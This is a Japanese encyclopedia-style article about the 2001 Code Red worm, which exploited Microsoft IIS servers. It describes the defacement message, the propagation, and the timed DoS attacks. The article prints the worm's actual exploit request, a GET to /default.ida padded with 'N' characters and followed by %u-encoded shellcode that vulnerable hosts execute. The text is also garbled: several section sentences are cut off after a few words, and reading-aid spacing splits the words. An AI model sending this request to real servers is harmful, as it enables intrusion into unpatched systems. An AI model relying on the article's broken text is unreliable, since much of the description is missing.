Code Red
Code Red(コードレッド)は、2001
概説
利用 された脆弱 性
このワームは IIS に
このワームは
ワームのペイロード
このワームのペイロードには、
感染 したWebサイトは次 のように表示 させられる(最後 の部分 はネット上 での敗北 を表 す決 まり文句 となった。外部 リンク参照 )
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
- インターネット
上 のIISサーバを探 し、さらに感染 させようとする。 感染 後 20日 から27日 待 って、いくつかの固定 のIPアドレスにDoS攻撃 を仕掛 けるようになっていた。攻撃 目標 にはホワイトハウスのWebサーバも含 まれていた[1]。
- GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
- NNNNNNNNNNNNNNNNNNN
- %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
- %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
- %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
類似 のワーム
2001
eEye はワームの
脚注
注釈
- ^ このワームのペイロードは 'N' の
羅列 の後 の文字 列 である。脆弱 なホストはこの文字 列 を命令 列 として実行 してしまう。
出典
- ^ a b Moore, David; Colleen Shannon (2001
年 ?). “The Spread of the Code-Red Worm (CRv2)”. CAIDA Analysis. 2006年 10月 3日 閲覧 。
外部 リンク
- CERT Advisory CA-2001-19
- eEye Code Red advisory
- Code Red II analysis
- Urban Dictionary における "Hacked by Chinese" というフレーズについての
説明